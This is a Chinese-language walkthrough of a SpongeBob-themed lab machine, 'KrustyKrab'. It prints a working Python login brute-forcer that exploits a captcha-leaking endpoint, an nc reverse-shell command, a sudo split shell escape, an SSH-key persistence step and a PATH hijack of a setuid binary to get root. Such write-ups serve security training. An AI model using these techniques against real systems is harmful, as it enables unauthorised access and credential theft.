踩点
80端口访问是一个Apache 默认页
在源码中得到
/var/www/html/finexo
访问finexo
有登录功能
第一个用户存在
在登录页面的源码中发现js文件
很明显的jsfuck
解出
function generateCaptcha() { $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $code = ""; $seed = time(); mt_srand($seed); for ($i = 0; $i < 4; $i++) { $code .= $characters[mt_rand(0, strlen($characters) - 1)]; } $_SESSION['captcha'] = strtolower($code); return $code; }
得到了验证码的生成逻辑
依靠Unix
时间戳挑选出四个字母组成验证码
发现访问http://ip/finexo/login.php?action=generateCaptcha
直接就会给出验证码我们写爆破脚本访问那验证码即可
import requests # 导入 requests 库,用于发送 HTTP 请求 # 定义目标 URL # 注意:请确保这里的 IP 地址是你要测试的实际目标 IP! # 根据之前的讨论,如果是原来的目标,应该是 'http://192.168.56.132/finexo/login.php' captcha_url = 'http://192.168.56.132/finexo/login.php?action=generateCaptcha' # 验证码生成接口的 URL login_url = 'http://192.168.56.132/finexo/login.php' # 登录页面的 URL # 创建会话对象 # 使用 requests.Session() 可以保持会话(例如,管理 cookies),这对于登录和验证码机制至关重要。 session = requests.Session() cnt = 0 # 初始化尝试次数计数器 # 打开 rockyou.txt 字典文件 # 'r' 表示只读模式,encoding="utf-8" 指定文件编码,errors="ignore" 忽略编码错误 with open('rockyou.txt', 'r', encoding="utf-8", errors="ignore") as f: # 遍历字典文件中的每一行(每个密码) for password in f.readlines(): # 步骤1: 获取验证码 # 向验证码生成接口发送 GET 请求,获取响应文本,去除空白字符,并转换为小写。 # 这是利用了验证码文本直接返回给前端的漏洞点。 try: captcha_response = session.get(captcha_url) captcha = captcha_response.text.strip().lower() if not captcha: # 如果获取到的验证码为空,则跳过此次尝试 print(f" [警告] 无法获取验证码,跳过密码: {password.strip()}") continue except requests.exceptions.RequestException as e: print(f" [错误] 获取验证码失败: {e},跳过密码: {password.strip()}") continue # 去除从字典文件中读取的密码两端的空白字符(如换行符) password = password.strip() # 构造登录请求的 POST 数据 data = { 'username': 'spongebob', # 确定用户名为 'spongebob' 'password': f'{password}', # 使用当前字典中的密码 'captcha': captcha # 使用实时获取到的验证码 } # 步骤2: 发送 POST 请求进行登录 # 使用会话对象发送数据到登录 URL try_login = session.post(login_url, data=data) cnt += 1 # 每次尝试后增加计数 # 输出当前尝试的密码和总尝试次数,便于跟踪进度 print(f"正在尝试密码: {password} (第 {cnt} 次尝试)") # 步骤3: 检查登录结果 # 判断响应文本中是否包含表示登录成功的关键词 "successful" if "successful" in try_login.text: print(f"\n--- 成功!---") print(f"登录成功,找到密码: {password}") # 找到密码后,立即停止循环 break # 如果你还想查看其他非成功非明确错误的响应,可以在这里添加更详细的条件和打印。 # 目前脚本只打印成功信息。
根据靶机无处不在的海绵宝宝元素生成密码本进行爆破
spongebob Spongebob SPONGEBOB spongebob1 spongebob123 spongebob@ spongebob! spongebob_squarepants SpongeBobSquarePants squarepants Squarepants patrick Patrick PATRICK patrick123 star Star squidward Squidward SQUIDWARD tentacles mrkrabs Mrkrabs MrKrabs krabs Krabs pearl Pearl sandy Sandy chipmunk plankton Plankton chum bucket ChumBucket gary Gary meow pineapple Pineapple bikini bottom BikiniBottom krabbypatty KrabbyPatty formula secretformula jellyfish Jellyfish net bubble Bubble blower clarinet Clarinet gloveworld GloveWorld rockbottom RockBottom goofygoober GoofyGoober jellyfishing Jellyfishing chumbucket kelprea thekrustykrab KrustyKrab finexo Finexo finexo123 finexo@ finexo!
成功得到密码SpongeBob/squarepants
可以上传图片🐎
但是抓住这个包可以改身份
但是不能利用
可以直接更改身份为Administratro但是失败了不能直接变为Administratro但是我们仍然成功为Administratro更改了密码
成功登录
管理员就是好可以直接执行命令
nc 192.168.56.103 8888 -e /bin/sh
监听得到shell
www-data@KrustyKrab:/home$ sudo -l Matching Defaults entries for www-data on KrustyKrab: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User www-data may run the following commands on KrustyKrab: (KrustyKrab) NOPASSWD: /usr/bin/split
www-data@KrustyKrab:/home$ sudo -u KrustyKrab split --filter=/bin/sh /dev/stdin whoami KrustyKrab
在KrustyKrab目录下得到userflag
权限维持可以搞个ssh密钥登陆
mkdir -p ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0lTDrkYOmPAyKqDSdWVZuDsOnMhScsUK765Po98D9HXbhTKDUbBQ6QhcfTOfiKI/rTK8sgKyulNd6Uyf/MBV7YT6qOtzP7fQ054PFZQViXQNwtcsFmyFLHlnpZzsfoC1eW3EX1/6pyNWfNr+SZrbWJOnaqTzq5ajT9Yob/BSMjrFFnckfqlfFSryTVTFtT64wlyo2x7o6aE9Fvc7b/tWqBZT/H2EqRFZ/4mwz69jrXO6xwhxbNDpPclwhSCR1POMy5HYMPB1cV2vCG+ecwqYR1tbpb5FsksJlKKZe4PPueYBTR1LkIrm12kLLiTzcdcXnVsBtiTrtv/NEi0VwMeD9UWwaUW2k31sE2cehVHeVlas1vQg/t51/kVfTptlrvPWxjSClzxh+Nxtb9AlE87f+9Km2CgwdG9q4UZ4T6sc0xTbtva/N+FEPKuq9kV9Hn7LrLFG9XlkttLh4NggFRW0ddRT3HlJkpJ52LkxaB4+OjoomPp4/LcS7RUkKnn1gEns= root@kali">~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys
┌──(root㉿kali)-[/myift/krus] └─# ssh KrustyKrab@192.168.56.132 -i id_rsa The authenticity of host '192.168.56.132 (192.168.56.132)' can't be established. ED25519 key fingerprint is SHA256:0d4MWSfQ+tUZ0f4j8Wea2uYelBzzcaj0CI4NtYQIx0E. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.132' (ED25519) to the list of known hosts. Linux KrustyKrab 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Mar 30 00:15:24 2025 from 192.168.56.118 KrustyKrab@KrustyKrab:~$
KrustyKrab目录下还有个help图片
┌──(root㉿kali)-[/myift/krus] └─# file help help: GIF image data, version 89a, 480 x 270 KrustyKrab@KrustyKrab:~$ sudo -l Matching Defaults entries for KrustyKrab on KrustyKrab: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User KrustyKrab may run the following commands on KrustyKrab: (spongebob) NOPASSWD: /usr/bin/ttteeesssttt
使用/usr/bin/ttteeesssttt操作
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt Spongebob forgot how to make Krabby Patty, You need to help him! Current shuffled recipe order: A: Pickles B: Ketchup C: Lettuce D: Patty E: Onion F: Top bun G: Mustard H: Cheese I: Tomato J: Bottom bun Please enter the correct order using letters (e.g., ABCDEFGHIJ): Enter 10 letters (A-J):
答案就在动图中
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt Spongebob forgot how to make Krabby Patty, You need to help him! Current shuffled recipe order: A: Tomato B: Onion C: Lettuce D: Ketchup E: Pickles F: Top bun G: Patty H: Cheese I: Bottom bun J: Mustard Please enter the correct order using letters (e.g., ABCDEFGHIJ): Enter 10 letters (A-J): IGCHBADJEF Validation successful! Perfect Krabby Patty! spongebob@KrustyKrab:/home/KrustyKrab$
直接就来到了spongebob用户
spongebob@KrustyKrab:/home/KrustyKrab$ cd spongebob@KrustyKrab:~$ ls key1 key2.jpeg note.txt spongebob@KrustyKrab:~$ file key1 key1: ASCII text spongebob@KrustyKrab:~$ cat key1 e1964798cfe86e914af895f8d0291812 spongebob@KrustyKrab:~$ cat note.txt Squidward is waiting for you!!!! password is md5($key1$key2). It's not so hard as you think. You have new mail in /var/mail/spongebob 章鱼哥在等你!!!! 密码为md5($key1$key2)。 没有你想的那么难。 在/var/mail/spongebob中有新邮件 spongebob@KrustyKrab:~$
(好帅的章鱼哥)
本来以为key2藏在里面结果是我想多了
直接拿图片的md5值
┌──(root㉿kali)-[/myift/krus] └─# md5sum key2.jpeg 5e1d0c1a168dc2d70004c2b00ba314ae key2.jpeg
直接计算
┌──(root㉿kali)-[/myift/krus] └─# echo -n "e1964798cfe86e914af895f8d02918125e1d0c1a168dc2d70004c2b00ba314ae" | md5sum 7ac254848d6e4556b73398dde2e4ef82 -
spongebob@KrustyKrab:/home$ su Squidward Password: $ whoami Squidward
登录成功
$ find / -perm -u=s -type f 2>/dev/null /home/Squidward/laststep /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/chsh /usr/bin/umount /usr/bin/gpasswd /usr/bin/chfn /usr/bin/su /usr/bin/at /usr/bin/newgrp /usr/bin/sudo /usr/bin/mount /usr/bin/passwd /usr/sbin/exim4
发现可利用文件laststep
$ file laststep laststep: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b84dc5079c77a9f2f2d82492f95a9c110ec51c87, for GNU/Linux 3.2.0, not stripped $ strings laststep /lib64/ld-linux-x86-64.so.2 setgid setuid system __libc_start_main __cxa_finalize libc.so.6 GLIBC_2.2.5 GLIBC_2.34 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable PTE1 u+UH cat /etc/shadow ;*3$" GCC: (Debian 12.2.0-14) 12.2.0 Scrt1.o __abi_tag crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.0 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry test.c __FRAME_END__ _DYNAMIC __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_start_main@GLIBC_2.34 _ITM_deregisterTMCloneTable _edata _fini system@GLIBC_2.2.5 __data_start __gmon_start__ __dso_handle _IO_stdin_used _end __bss_start main setgid@GLIBC_2.2.5 __TMC_END__ _ITM_registerTMCloneTable setuid@GLIBC_2.2.5 __cxa_finalize@GLIBC_2.2.5 _init .symtab .strtab .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment
可执行文件执行
cat /etc/shadow
cat不是绝对路径调用可以进行路径劫持
$ echo bash > cat $ ls cat laststep $ chmod 777 cat $ PATH=.:$PATH $ ./laststep root@KrustyKrab:~#